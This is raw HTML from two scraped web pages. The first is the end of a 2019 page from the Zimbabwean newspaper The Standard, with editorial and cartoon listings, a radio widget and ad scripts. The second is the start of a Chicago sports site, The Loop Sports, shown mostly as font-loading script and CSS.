&#8211; 04 &#8211; 19">Standard Cartoon 21 &#8211; 04 &#8211; 19</a></h5> <p>Standard Cartoon 21 &#8211; 04 &#8211; 19</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/02/24/standard-cartoon-24-02-19/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2019/02/Screen-Shot-2019-02-23-at-9.48.02-PM-50x50.png" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/02/Screen-Shot-2019-02-23-at-9.48.02-PM-50x50.png 50w, https://www.thestandard.co.zw/wp-content/uploads/2019/02/Screen-Shot-2019-02-23-at-9.48.02-PM-150x150.png 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/02/24/standard-cartoon-24-02-19/" rel="bookmark" title="Permanent Link to Standard Cartoon 24 &#8211; 02 &#8211; 19">Standard Cartoon 24 &#8211; 02 &#8211; 19</a></h5> <p>Standard Cartoon 24 &#8211; 02 &#8211; 19</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/02/10/standard-cartoon-10-02-19/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2019/02/Screen-Shot-2019-02-09-at-10.39.56-PM-50x50.png" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/02/Screen-Shot-2019-02-09-at-10.39.56-PM-50x50.png 50w, https://www.thestandard.co.zw/wp-content/uploads/2019/02/Screen-Shot-2019-02-09-at-10.39.56-PM-150x150.png 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/02/10/standard-cartoon-10-02-19/" rel="bookmark" title="Permanent Link to Standard Cartoon 10 &#8211; 02 &#8211; 19">Standard Cartoon 10 &#8211; 02 &#8211; 19</a></h5> <p>Standard Cartoon 10 &#8211; 02 &#8211; 19</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/01/20/standard-cartoon-20-01-19/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2019/01/Screen-Shot-2019-01-19-at-10.31.05-PM-50x50.png" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/01/Screen-Shot-2019-01-19-at-10.31.05-PM-50x50.png 50w, https://www.thestandard.co.zw/wp-content/uploads/2019/01/Screen-Shot-2019-01-19-at-10.31.05-PM-150x150.png 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/01/20/standard-cartoon-20-01-19/" rel="bookmark" title="Permanent Link to Standard Cartoon 20 &#8211; 01 &#8211; 19">Standard Cartoon 20 &#8211; 01 &#8211; 19</a></h5> <p>Standard Cartoon 20 &#8211; 01 &#8211; 19</p> <div class="fix"></div> </li> </ul><br/> <script type="text/javascript"><!-- google_ad_client = "ca-pub-3786607324213394"; /* ST_Homepage */ google_ad_slot = "8121047080"; google_ad_width = 300; google_ad_height = 250; //--> </script> <script type="text/javascript" src="//pagead2.googlesyndication.com/pagead/show_ads.js"> </script> </div> <!-- EDITORIAL --> <div class="cat-posts fr"> <div class="block-header"> <h4 class="fl"><a href="https://www.thestandard.co.zw/editorial/">Editorial</a></h4> <a class="fr" href="https://www.thestandard.co.zw/editorial/">View more</a> <div class="fix"></div> </div> <ul> <li> <a href="https://www.thestandard.co.zw/2019/05/12/editorial-comment-mine-tragedy-wake-call/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Nugget-Mine-Accident-KB-Mpofu-19-50x50.gif" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Nugget-Mine-Accident-KB-Mpofu-19-50x50.gif 50w, https://www.thestandard.co.zw/wp-content/uploads/2019/05/Nugget-Mine-Accident-KB-Mpofu-19-150x150.gif 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/12/editorial-comment-mine-tragedy-wake-call/" rel="bookmark" title="Permanent Link to Editorial Comment: Mine tragedy a wake-up call">Editorial Comment: Mine tragedy a wake-up call</a></h5> <p>The death of five artisanal miners at a mine in Matabeleland South last week was yet another sad reminder of the lawlessness that is creeping into the mining sector in [&hellip;]</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/05/editorial-comment-rot-bigger-chitungwiza/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2018/06/emmerson-mnangagwa-2-50x50.jpg" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2018/06/emmerson-mnangagwa-2-50x50.jpg 50w, https://www.thestandard.co.zw/wp-content/uploads/2018/06/emmerson-mnangagwa-2-150x150.jpg 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/05/editorial-comment-rot-bigger-chitungwiza/" rel="bookmark" title="Permanent Link to Editorial Comment: The rot is bigger than Chitungwiza">Editorial Comment: The rot is bigger than Chitungwiza</a></h5> <p>The Chitungwiza problems that grabbed President Emmerson Mnangagwa’s attention on Friday after they were catalogued by the town’s mayor are a mirror of the rot facing the majority of Zimbabwe’s [&hellip;]</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/04/28/cannot-afford-give/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2018/09/tiger-woods-50x50.jpg" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2018/09/tiger-woods-50x50.jpg 50w, https://www.thestandard.co.zw/wp-content/uploads/2018/09/tiger-woods-150x150.jpg 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/04/28/cannot-afford-give/" rel="bookmark" title="Permanent Link to You cannot afford to give up on yourself">You cannot afford to give up on yourself</a></h5> <p>Inspiration with Cynthia Chirinda At 10 years old, he decided to end his life. In his own home. He wanted to drown himself in the bathtub and put an end [&hellip;]</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/04/28/pr-important-crucial-age-rapid-tech-changes/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2019/04/Lenox-Mhlanga-50x50.gif" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/04/Lenox-Mhlanga-50x50.gif 50w, https://www.thestandard.co.zw/wp-content/uploads/2019/04/Lenox-Mhlanga-150x150.gif 150w, https://www.thestandard.co.zw/wp-content/uploads/2019/04/Lenox-Mhlanga-300x300.gif 300w, https://www.thestandard.co.zw/wp-content/uploads/2019/04/Lenox-Mhlanga-100x100.gif 100w, https://www.thestandard.co.zw/wp-content/uploads/2019/04/Lenox-Mhlanga-200x200.gif 200w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/04/28/pr-important-crucial-age-rapid-tech-changes/" rel="bookmark" title="Permanent Link to Why PR is important crucial in age of rapid tech changes">Why PR is important crucial in age of rapid tech changes</a></h5> <p>public relations with Lenox Lizwi Mhlanga Public relations (PR) is the inthing. Businesses executives the world over have come to recognize the value of a strategic PR campaign. (more&hellip;)</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/04/28/dark-ugly-side-gambling/"><img width="50" height="50" src="https://www.thestandard.co.zw/wp-content/uploads/2019/04/Gambling-50x50.gif" class="attachment-cat-thumb size-cat-thumb wp-post-image" alt="" srcset="https://www.thestandard.co.zw/wp-content/uploads/2019/04/Gambling-50x50.gif 50w, https://www.thestandard.co.zw/wp-content/uploads/2019/04/Gambling-150x150.gif 150w" sizes="(max-width: 50px) 100vw, 50px" /></a> <h5><a href="https://www.thestandard.co.zw/2019/04/28/dark-ugly-side-gambling/" rel="bookmark" title="Permanent Link to The dark, ugly side of gambling">The dark, ugly side of gambling</a></h5> <p>Odds, home side, away side — such is the vocabulary of those with a knack for gambling and one thing in particular they will tell you is that the transition [&hellip;]</p> <div class="fix"></div> </li> </ul> </div> <div class="line"></div> <!-- RECENT --> <div class="recent-posts"> <div class="block-header"> <h4>Recent Posts</a></h4> </div> <ul> <li> <a href="https://www.thestandard.co.zw/2019/05/15/chaka-chaya-neecocash-promotion-back-bigger/"><img width="200" height="100" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Mr-Eddie-Chibi--200x100.jpg" class="attachment-recent-post size-recent-post wp-post-image" alt="" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/15/chaka-chaya-neecocash-promotion-back-bigger/" rel="bookmark" title="Permanent Link to ‘Chaka-Chaya neEcoCash’ promotion back and bigger">‘Chaka-Chaya neEcoCash’ promotion back and bigger</a></h5> <p>The multi million dollar ‘ChakaChaya neEcoCash’ promotion is back.</p> <div class="fix"></div> </li> <li> <a href="https://www.thestandard.co.zw/2019/05/14/new-nissan-navara-to-be-built-in-africa/"><img width="200" height="100" src="https://www.thestandard.co.zw/wp-content/uploads/2019/05/Navaraselector2.png.ximg_.l_12_m.smart_-200x100.png" class="attachment-recent-post size-recent-post wp-post-image" alt="" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/14/new-nissan-navara-to-be-built-in-africa/" rel="bookmark" title="Permanent Link to New Nissan Navara to be built in Africa">New Nissan Navara to be built in Africa</a></h5> <p>Nissan has announced that it will next year start building its award-winning Nissan Navara one-ton pick-up from its Rosslyn plant in Pretoria, South Africa.</p> <div class="fix"></div> </li> <li class="last"> <a href="https://www.thestandard.co.zw/2019/05/13/living-storms-life/"><img width="200" height="100" src="https://www.thestandard.co.zw/wp-content/uploads/2019/03/doug-mamvura-200x100.jpg" class="attachment-recent-post size-recent-post wp-post-image" alt="" /></a> <h5><a href="https://www.thestandard.co.zw/2019/05/13/living-storms-life/" rel="bookmark" title="Permanent Link to Living above the storms of life">Living above the storms of life</a></h5> <p>This world is a very cruel place and it does not owe anyone anything. Jesus stated that in this world we would have trials and tribulations, but He also encouraged [&hellip;]</p> <div class="fix"></div> </li> </ul> </div> <br/> <script type="text/javascript"><!-- google_ad_client = "ca-pub-3786607324213394"; /* inhouse-zimind-home */ google_ad_slot = "3690923440/9686113840"; google_ad_width = 728; google_ad_height = 90; //--> </script> <script type="text/javascript" src="//pagead2.googlesyndication.com/pagead/show_ads.js"> </script> </section><!-- /#main --> <aside id="sidebar"> <div id="text-64" class="widget widget_text"><h3>Heart And Soul Radio</h3> <div class="textwidget"><p><p><script> jQuery(function() { jQuery("#lbg_audio4_html5_shoutcast_1").audio4_html5({ skin:"blackControllers", playerWidth:350, responsive:true, initialVolume:0.5, autoPlay:false, volumeOffColor:"#454545", volumeOnColor:"#FFFFFF", songTitleColor:"#000000", radioStationColor:"#000000", frameBehindPlayerColor:"#000000", imageBorderWidth:4, imageBorderColor:"#000000", showVolume:true, showRadioStation:true, showTitle:true, showNextPrevBut:true, autoHidePlayButton:true, showFacebookBut:true, facebookAppID:"", facebookShareTitle:"heart and soul radio broadcasting", facebookShareDescription:"", showTwitterBut:true, beneathTitleBackgroundColor_VisiblePlaylist:"#c55151", beneathTitleBackgroundOpacity_VisiblePlaylist:100, beneathTitleBackgroundColor_HiddenPlaylist:"#c55151", beneathTitleBackgroundOpacity_HiddenPlaylist:100, beneathTitleBackgroundBorderColor:"#000000", beneathTitleBackgroundBorderWidth:3, translateRadioStation:"Radio Station: ", translateSongTitle:"Now Playing: heart and soul", translateReadingData:"reading data...", translateAllRadioStations:"ALL RADIO STATIONS", showPlaylistBut:false, showPlaylist:false, showPlaylistOnInit:false, playlistTopPos:6, playlistBgColor:"#c55151", playlistRecordBgOffColor:"#000000", playlistRecordBgOnColor:"#000000", playlistRecordBottomBorderOffColor:"#333333", playlistRecordBottomBorderOnColor:"#4d4d4d", playlistRecordTextOffColor:"#777777", playlistRecordTextOnColor:"#00b4f9", categoryRecordBgOffColor:"#000000", categoryRecordBgOnColor:"#252525", categoryRecordBottomBorderOffColor:"#2f2f2f", categoryRecordBottomBorderOnColor:"#2f2f2f", categoryRecordTextOffColor:"#777777", categoryRecordTextOnColor:"#00b4f9", numberOfThumbsPerScreen:7, playlistPadding:18, firstCateg:"ALL RADIO STATIONS", showCategories:false, selectedCategBg:"#000000", selectedCategOffColor:"#FFFFFF", selectedCategOnColor:"#00b4f9", selectedCategMarginBottom:12, showSearchArea:false, searchAreaBg:"#000000", searchInputText:"search...", searchInputBg:"#ffffff", searchInputBorderColor:"#333333", searchInputTextColor:"#333333", showPlaylistNumber:false, pathToAjaxFiles:"https://www.thestandard.co.zw/wp-content/plugins/lbg-audio4-html5-shoutcast/audio4_html5/", nowPlayingInterval:35, grabLastFmPhoto:true, grabStreamnameAndGenre:true, noImageAvailable:"https://www.thestandard.co.zw/wp-content/uploads/2018/09/noimageavailable-1.jpg" }); }); </script> <div class="audio4_html5"> <audio id="lbg_audio4_html5_shoutcast_1" preload="metadata"> <div class="xaudioplaylist"><ul> <li class="xradiostream">http://zas3.ndx.co.za/proxy/heartandsoul?mp=/stream</li><li class="xstation">Heart And Soul</li> </ul></div> No HTML5 audio playback capabilities for this browser. Use <a href="https://www.google.com/intl/en/chrome/browser/">Chrome Browser!</a> </audio> </div> <br style="clear:both;"></p></p> </div> </div><div id="adrotate_widgets-10" class="widget adrotate_widgets"><div class="g g-2"><div class="g-dyn a-72 c-1"><a href="https://www.digital.newsday.co.zw/" target="_blank"><img src="https://www.thestandard.co.zw/wp-content/uploads/2018/11/PHOTO-2018-11-12-18-33-20-2.jpg" /></a></div></div></div><div id="text-7" class="widget widget_text"><h3>Like Us On Facebook</h3> <div class="textwidget"><iframe src="//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2Fpages%2FThe-Standard-Newspaper%2F103305193039107&amp;width=300&amp;height=290&amp;show_faces=true&amp;colorscheme=light&amp;stream=false&amp;border_color&amp;header=true" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:290px;" allowTransparency="true"></iframe></div> </div><div id="custom_html-2" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"></div></div><div id="adrotate_widgets-8" class="widget adrotate_widgets"><div class="g g-3"><div class="g-dyn a-73 c-1"><a href="https://www.digital.newsday.co.zw/" target="_blank"><img src="https://www.thestandard.co.zw/wp-content/uploads/2018/11/PHOTO-2018-11-07-21-36-27.jpg" /></a></div></div></div><div id="text-24" class="widget widget_text"> <div class="textwidget"><iframe src="https://landing.mailerlite.com/webforms/landing/p4j5z8" style="border: none; width: 350px; height: 220px;"></iframe></div> </div></aside><!-- /#sidebar --> </div><!-- /#main-sidebar-container --> </div><!-- /#content --> <!-- Either there are no banners, they are disabled or none qualified for this location! --> <div class="subscribe-call"> <a href="https://www.thestandard.co.zw/subscribe/"><img src="https://www.thestandard.co.zw/wp-content/uploads/2016/09/std-footer-logo.png" alt="logo" width="300"/></a> <a class="subscribe-text" href="https://www.thestandard.co.zw/subscribe/">Subscribe to The Standard now</a> <a class="button" href="https://www.thestandard.co.zw/subscribe/">Subscribe</a> <div class="fix"></div> </div> <div class="footer-nav-container"> <div class="footer-nav"> <p>Legal:</p> <div class="menu"><ul id="menu-legal-menu" class="nav"><li id="menu-item-56557" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-56557"><a href="https://www.thestandard.co.zw/copyright/">Copyright</a></li> <li id="menu-item-53577" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-53577"><a href="https://www.thestandard.co.zw/disclaimer/">Disclaimer</a></li> <li id="menu-item-53578" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-53578"><a href="https://www.thestandard.co.zw/privacy-policy/">Privacy Policy</a></li> <li id="menu-item-53579" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-53579"><a href="https://www.thestandard.co.zw/terms-and-conditions/">Terms and Conditions</a></li> </ul></div> <div class="fix"></div> </div> <div class="footer-nav"> <p>Our Partners:</p> <div class="menu"><ul id="menu-partner-sites" class="nav"><li id="menu-item-54709" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-54709"><a href="http://theindependent.co.zw/">Zimbabwe Independent</a></li> <li id="menu-item-54710" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-54710"><a href="http://newsday.co.zw/">NewsDay</a></li> <li id="menu-item-210006720922598" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-210006720922598"><a href="http://www.southerneye.co.zw/">Southern Eye</a></li> <li id="menu-item-54711" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-54711"><a href="http://mg.co.za/">Mail &#038; Guardian</a></li> <li id="menu-item-210006720933881" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-210006720933881"><a href="http://www.myclassifieds.co.zw">MyClassifieds</a></li> </ul></div> <div class="fix"></div> </div> <div class="footer-nav"> <p>Categories:</p> <div class="menu"><ul id="menu-footer-categories" class="nav"><li id="menu-item-54712" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-54712"><a href="https://www.thestandard.co.zw/local-zimbabwe-stories/">Local</a></li> <li id="menu-item-54716" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-54716"><a href="https://www.thestandard.co.zw/opinion/">Opinion</a></li> <li id="menu-item-54717" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-54717"><a href="https://www.thestandard.co.zw/editorial/">Editorial</a></li> <li id="menu-item-54719" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-54719"><a href="https://www.thestandard.co.zw/international/">International</a></li> <li id="menu-item-54714" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-54714"><a href="https://www.thestandard.co.zw/letters/">Letters</a></li> <li id="menu-item-54720" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-54720"><a href="https://www.thestandard.co.zw/cartoons/">Cartoons</a></li> <li id="menu-item-210006720928162" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-210006720928162"><a href="https://www.thestandard.co.zw/queenmakers/">QueenMakers</a></li> </ul></div> <div class="fix"></div> </div> <div class="footer-nav last"> <p>The Standard:</p> <div class="menu"><ul id="menu-the-standard" class="nav"><li id="menu-item-54721" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54721"><a href="https://www.thestandard.co.zw/about-us/">About us</a></li> <li id="menu-item-54723" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54723"><a href="https://www.thestandard.co.zw/contact-us/">Contact us</a></li> <li id="menu-item-54724" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54724"><a href="https://www.thestandard.co.zw/subscribe/">Subscribe</a></li> <li id="menu-item-54722" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54722"><a href="https://www.thestandard.co.zw/advertise/">Advertise</a></li> </ul></div> <div class="fix"></div> </div> </div> <footer id="footer" class="col-full"> <div class="col-left"> <p><img src="/wp-content/uploads/2016/06/amh-logo-smal-1.jpg" alt="AMH logo" /></p> </div> <div class="col-mid"> <p>© 2019 The Zimind. All Rights reserved.</p> </div> <div class="col-right"> <p><img src="/wp-content/uploads/2012/05/dmma-logo.jpg" alt="DMMA logo" /></p> </div> </footer> <script type="text/javascript"> window._taboola = window._taboola || []; _taboola.push({flush: true}); </script> </div><!-- /#inner-wrapper --> </div><!-- /#wrapper --> <div class="fix"></div><!--/.fix--> <img src="" id="fsb_image"/> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-includes/js/jquery/ui/slider.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-includes/js/jquery/ui/effect.min.js?ver=1.11.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var impression_object = {"ajax_url":"https:\/\/www.thestandard.co.zw\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/plugins/adrotate/library/jquery.adrotate.dyngroup.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var click_object = {"ajax_url":"https:\/\/www.thestandard.co.zw\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/plugins/adrotate/library/jquery.adrotate.clicktracker.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var qpprFrontData = {"linkData":[],"siteURL":"https:\/\/www.thestandard.co.zw","siteURLq":"https:\/\/www.thestandard.co.zw"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.1.8'></script> <script type='text/javascript' src='https://www.thestandard.co.zw/wp-includes/js/wp-embed.min.js?ver=4.8.9'></script> <!-- AdRotate JS --> <script type="text/javascript"> jQuery(document).ready(function(){ if(jQuery.fn.gslider) { jQuery('.g-2').gslider({ groupid: 2, speed: 12000 }); jQuery('.g-3').gslider({ groupid: 3, speed: 15000 }); jQuery('.g-4').gslider({ groupid: 4, speed: 12000 }); jQuery('.g-5').gslider({ groupid: 5, speed: 12000 }); jQuery('.g-6').gslider({ groupid: 6, speed: 12000 }); } }); </script> <!-- /AdRotate JS --> </body> </html> <!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/ Page Caching using disk: enhanced Served from: thestandard.co.zw @ 2019-05-16 16:49:50 by W3 Total Cache -->
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="https://theloopsports.com/xmlrpc.php"> <title>The Loop Sports - Chicago Sports News and Opinion</title> <script type="text/javascript"> WebFontConfig = {"typekit":{"id":"bmz5dfv"}}; (function() { var wf = document.createElement('script'); wf.src = 'https://theloopsports.com/wp-content/mu-plugins/wpcomsh/vendor/automattic/custom-fonts/js/webfont.js'; wf.type = 'text/javascript'; wf.async = 'true'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(wf, s); })(); </script><style id="jetpack-custom-fonts-css">.wf-active body{font-family:"minion-pro","minion-pro-1",serif}.wf-active .entry-content, .wf-active .entry-content dl, .wf-active .entry-content ol, .wf-active .entry-content p, .wf-active .entry-content table, .wf-active .entry-content ul, .wf-active .entry-header .intro p, .wf-active .entry-summary, .wf-active .section-about-column-one p, .wf-active .widget, .wf-active p.text-big, .wf-active p.text-small{font-family:"minion-pro","minion-pro-1",serif}.wf-active #colophon .widget, .wf-active .contact-form input[type="submit"], .wf-active .entry-content blockquote p, .wf-active .entry-content p span.uppercase, .wf-active .section-about-column-one p cite, .wf-active .section-about-column-two .jetpack-social-navigation ul li a, .wf-active .site-content div.wpcf7 input, .wf-active .site-content div.wpcf7 p, .wf-active .site-content div.wpcf7 textarea, .wf-active .widget_blog_subscription #subscribe-blog input#subscribe-field, .wf-active .widget_blog_subscription #subscribe-submit input[type="submit"], .wf-active a.standard-btn, .wf-active input, .wf-active textarea{font-family:"minion-pro","minion-pro-1",serif}.wf-active code, .wf-active kbd, .wf-active pre, .wf-active tt, .wf-active var{font-family:"minion-pro","minion-pro-1",serif}.wf-active input#submit, .wf-active input[type="button"], .wf-active input[type="submit"]{font-family:"minion-pro","minion-pro-1",serif}.wf-active .widget_search input.search-field{font-family:"minion-pro","minion-pro-1",serif}.wf-active .widget_blog_subscription #subscribe-blog p input#subscribe-field{font-family:"minion-pro","minion-pro-1",serif}.wf-active h1.site-title, .wf-active p.site-title, .wf-active .featured-slider .entry-header h2.entry-title, .wf-active .blog-wrap h3.blog-title, .wf-active .entry-header h2.entry-title, .wf-active .front-section-title, .wf-active .social-front-title, .wf-active .title-footer, .wf-active .footer-widgetarea h3.footer-widget-title, .wf-active .widget h2.widget-title{font-family:"minion-pro","minion-pro-1",serif;font-style:normal;font-weight:400}.wf-active #secondary h2.widget-title, .wf-active #sidebar-page h2.widget-title, .wf-active h1, .wf-active h2, .wf-active h3, .wf-active h4, .wf-active h5, .wf-active h6, .wf-active .entry-content h1, .wf-active .entry-content h2, .wf-active .entry-content h3, .wf-active .entry-content h4, .wf-active .entry-content h5, .wf-active .entry-content h6, .wf-active div.sharedaddy h3.sd-title{font-family:"minion-pro","minion-pro-1",serif;font-style:normal;font-weight:400}.wf-active h1.site-title, .wf-active p.site-title{font-style:normal;font-weight:400}.wf-active #front-section-four .entry-header h2.entry-title, .wf-active #front-section-three h3.front-section-title, .wf-active .archive-header h1.archive-title, .wf-active .blog #primary .hentry.has-post-thumbnail:nth-child(4n+1) .entry-header h2.entry-title, .wf-active .blog-wrap h3.blog-title, .wf-active .featured-slider .entry-header h2.entry-title, .wf-active .front-section-title, .wf-active .page h1.entry-title, .wf-active .recommended-posts-wrap #jp-relatedposts h3.jp-relatedposts-headline, .wf-active .section-one-column-one .entry-header h2.entry-title, .wf-active .section-three-column-one .entry-header h2.entry-title, .wf-active .single-post .entry-header h1.entry-title, .wf-active .social-front-title{font-style:normal;font-weight:400}.wf-active #secondary h2.widget-title, .wf-active #sidebar-page h2.widget-title{font-style:normal;font-weight:400}.wf-active .entry-header h2.entry-title{font-style:normal;font-weight:400}.wf-active #comments #respond h3#reply-title, .wf-active #comments h2.comments-title, .wf-active .authorbox h3.author-title, .wf-active .footer-widgetarea h3.footer-widget-title, .wf-active .widget_blog_subscription h2.widget-title{font-style:normal;font-weight:400}.wf-active div.sharedaddy h3.sd-title{font-style:normal;font-weight:400}.wf-active .entry-content h1{font-style:normal;font-weight:400}.wf-active .entry-content h2{font-style:normal;font-weight:400}.wf-active .entry-content h3{font-style:normal;font-weight:400}.wf-active .entry-content h4{font-style:normal;font-weight:400}.wf-active .entry-content h5{font-style:normal;font-weight:400}.wf-active .entry-content h6{font-style:normal;font-weight:400}.wf-active #comments h2.comments-title, .wf-active #desktop-navigation ul li a, .wf-active #overlay-nav ul li a, .wf-active .authorbox h3.author-title, .wf-active .page-links, .wf-active h1, .wf-active h2, .wf-active h3, .wf-active h4, .wf-active h5, .wf-active h6{font-weight:400;font-style:normal}.wf-active h1.site-title, .wf-active p.site-title{font-weight:400;font-style:normal}.wf-active .footer-widgetarea h3.footer-widget-title{font-weight:400;font-style:normal}.wf-active .authorbox h3.author-title span{font-style:normal;font-weight:400}.wf-active #comments h2.comments-title, .wf-active #comments #respond h3#reply-title{font-weight:400;font-style:normal}.wf-active .title-footer{font-weight:400;font-style:normal}.wf-active div.sharedaddy h3.sd-title{font-weight:400;font-style:normal}.wf-active .recommended-posts-wrap #jp-relatedposts h3.jp-relatedposts-headline{font-weight:400;font-style:normal}.wf-active .recommended-posts-wrap #jp-relatedposts .jp-relatedposts-items-visual h4.jp-relatedposts-post-title{font-style:normal;font-weight:400}@media screen and (min-width: 37.500em){.wf-active .page h1.entry-title, .wf-active .single-attachment .entry-header h1.entry-title, .wf-active .single-post .entry-header h1.entry-title{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active .entry-content h1{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active #front-section-four .entry-header h2.entry-title, .wf-active .archive-header h1.archive-title, .wf-active .blog #primary .hentry.has-post-thumbnail:nth-child(4n+1) .entry-header h2.entry-title, .wf-active .blog-wrap h3.blog-title, .wf-active .featured-slider .entry-header h2.entry-title, .wf-active .front-section-title, .wf-active .recommended-posts-wrap #jp-relatedposts h3.jp-relatedposts-headline, .wf-active .section-one-column-one .entry-header h2.entry-title, .wf-active .section-three-column-one .entry-header h2.entry-title, .wf-active .social-front-title{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active .entry-content h2{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active .entry-content h3, .wf-active .entry-header h2.entry-title{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active .entry-content h4{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active .entry-content h5, .wf-active .entry-content h6{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active #front-section-fourcolumn .type-post .entry-header h2.entry-title, .wf-active .section-one-column-two .type-post:nth-of-type(n+2) .entry-header h2.entry-title, .wf-active .section-sixcolumn-postwrap .type-post .entry-header h2.entry-title, .wf-active .section-three-column-two .type-post .entry-header h2.entry-title, .wf-active .section-two-column-two .type-post .entry-header h2.entry-title{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active .page div.sharedaddy h3.sd-title, .wf-active .page div.sharedaddy h3.sd-title, .wf-active .single-post div.sharedaddy h3.sd-title{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active .entry-header h2.entry-title{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active #front-section-twocolumn .entry-header h2.entry-title, .wf-active p.text-big{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active p.site-description{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active h1.site-title, .wf-active p.site-title{font-style:normal;font-weight:400}}@media screen and (min-width: 37.500em){.wf-active #front-section-four .entry-header h2.entry-title, .wf-active .blog #primary .hentry.has-post-thumbnail:nth-child(4n+1) .entry-header h2.entry-title, .wf-active .featured-slider .entry-header h2.entry-title, .wf-active .section-one-column-one .entry-header 